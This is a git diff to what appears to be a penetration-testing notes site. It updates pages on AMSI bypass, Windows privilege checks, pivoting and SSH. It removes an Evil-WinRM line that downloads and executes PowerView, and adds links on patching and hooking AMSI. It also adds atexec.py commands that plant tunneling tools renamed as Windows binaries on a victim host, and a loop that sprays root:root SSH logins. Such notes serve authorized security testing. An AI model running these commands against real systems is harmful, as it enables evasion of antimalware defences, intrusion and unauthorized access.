diff --git a/SUMMARY.md b/SUMMARY.md index 67fbac8..2406d17 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -96,6 +96,7 @@ - [DevOps](pentest/infrastructure/devops/README.md) * [Ansible](pentest/infrastructure/devops/ansible.md) * [Artifactory](pentest/infrastructure/devops/artifactory.md) + * [Atlassian](pentest/infrastructure/devops/atlassian.md) * [Containerization / Orchestration](pentest/infrastructure/devops/containerization-orchestration.md) * [GitLab](pentest/infrastructure/devops/gitlab.md) * [Jenkis](pentest/infrastructure/devops/jenkins.md) diff --git a/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md b/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md index c9b33b7..dc8f00a 100644 --- a/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md +++ b/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md @@ -13,10 +13,6 @@ description: Antimalware Scan Interface * [https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/](https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/) * [https://iwantmore.pizza/posts/amsi.html](https://iwantmore.pizza/posts/amsi.html) * [https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation](https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation) -* [https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/](https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/) -* [https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch](https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch) -* [https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/](https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/) -* [https://github.com/ZeroMemoryEx/Amsi-Killer/blob/master/README.md](https://github.com/ZeroMemoryEx/Amsi-Killer/blob/master/README.md) AMSI Test [Sample](https://gist.github.com/rasta-mouse/5cdf25b7d3daca5536773fdf998f2f08): @@ -27,17 +23,7 @@ PS > Invoke-Expression "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386" -## PowerShell - - - -### Evil-WinRM + IEX - -``` -*Evil-WinRM* PS > menu -*Evil-WinRM* PS > Bypass-4MSI -*Evil-WinRM* PS > IEX([Net.Webclient]::new().DownloadString("http://127.0.0.1/PowerView.ps1")) -``` +## Break the Logic @@ -84,6 +70,15 @@ $A="5492868772801748688168747280728187173688878280688776";$B="828117368086765687 + +## Memory Patching + +- [https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch](https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch) +- [https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/](https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/) +- [https://github.com/ZeroMemoryEx/Amsi-Killer](https://github.com/ZeroMemoryEx/Amsi-Killer) + + + ### Patch AmsiScanBuffer * [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) @@ -276,7 +271,9 @@ foreach ($p in $providers) { Get-ItemProperty "HKLM:\SOFTWARE\Classes\CLSID\$p\I -## Jscript +## Registry & Filesystem + +{% embed url="https://twitter.com/eversinc33/status/1666121784192581633" %} @@ -328,3 +325,21 @@ try { ... ``` {% endcode %} + + + + +## Hardware Breakpoints (Fileless Bypass) + +- [https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/](https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/) +- [https://gist.github.com/CCob/fe3b63d80890fafeca982f76c8a3efdf](https://gist.github.com/CCob/fe3b63d80890fafeca982f76c8a3efdf) +- [https://gist.github.com/susMdT/360c64c842583f8732cc1c98a60bfd9e](https://gist.github.com/susMdT/360c64c842583f8732cc1c98a60bfd9e) + + + + +## Hook NtCreateSection + +- [https://waawaa.github.io/es/amsi_bypass-hooking-NtCreateSection/](https://waawaa.github.io/es/amsi_bypass-hooking-NtCreateSection/) +- [https://s3cur3th1ssh1t.github.io/Cat_Mouse_or_Chess/](https://s3cur3th1ssh1t.github.io/Cat_Mouse_or_Chess/) +- [https://github.com/S3cur3Th1sSh1t/Ruy-Lopez](https://github.com/S3cur3Th1sSh1t/Ruy-Lopez) diff --git a/pentest/infrastructure/devops/atlassian.md b/pentest/infrastructure/devops/atlassian.md new file mode 100644 index 0000000..7b2511d --- /dev/null +++ b/pentest/infrastructure/devops/atlassian.md @@ -0,0 +1,8 @@ +# Atlassian + + + + +## Jira + +- [https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting](https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting) diff --git a/pentest/infrastructure/lpe.md b/pentest/infrastructure/lpe.md index 7cc8ae9..373d398 100644 --- a/pentest/infrastructure/lpe.md +++ b/pentest/infrastructure/lpe.md @@ -31,6 +31,7 @@ PS > Set-PSReadlineOption -HistorySaveStyle SaveNothing ``` PS > whoami == dir env: PS > whoami /groups == ([System.Security.Principal.WindowsIdentity]("$env:USERNAME")).Groups | % { $_.Translate([Security.Principal.NTAccount]) } | select -ExpandProperty value +PS > (New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) ``` diff --git a/pentest/infrastructure/pivoting.md b/pentest/infrastructure/pivoting.md index e9ab27e..c07f663 100644 --- a/pentest/infrastructure/pivoting.md +++ b/pentest/infrastructure/pivoting.md @@ -379,9 +379,9 @@ alice@victim:~$ nohup ./chisel client [--fingerprint ] [--auth sn Quicky: ``` -$ atexec.py -nooutput megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"' +$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"' $ sudo chisel client -v --auth snovvcrash:'Passw0rd!' 192.168.1.11:8000 127.0.0.1:1080:socks -$ atexec.py -nooutput megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe' +$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe' ``` @@ -425,15 +425,16 @@ alice@victim:~$ ./revsocks -connect 10.14.14.3:8000 -pass 'Passw0rd!' - [https://github.com/llkat/rsockstun](https://github.com/llkat/rsockstun) -{% content-ref url="/redteam/maldev/golang.md#garble" %} -[golang.md](golang.md) -{% endcontent-ref %} - ``` $ openssl req -new -x509 -keyout cert.key -out cert.crt -days 365 -nodes $ sudo rsockstun -listen :8000 -socks 127.0.0.1:1080 -cert cert -pass 'Passw0rd!' -$ atexec.py -nooutput megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"' -$ atexec.py -nooutput megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe' +``` + +Quicky: + +``` +$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"' +$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe' ``` diff --git a/pentest/perimeter/ssh.md b/pentest/perimeter/ssh.md index fda14c3..adf1fd2 100644 --- a/pentest/perimeter/ssh.md +++ b/pentest/perimeter/ssh.md @@ -11,6 +11,14 @@ description: Secure Shell - [https://github.com/mcorybillington/sshspray](https://github.com/mcorybillington/sshspray) +A list of targets with different SSH ports: + +``` +$ das parse ssh -raw | cut -c 7- | awk -F: '{print $1}' > ssh_hosts +$ das parse ssh -raw | cut -c 7- | awk -F: '{print $2}' > ssh_ports +$ paste ssh_hosts ssh_ports | while read host port; do cme ssh $host -u root -p root --port $port; done +``` + Password spray with a private key and passphrase `Passw0rd!` using CME: ```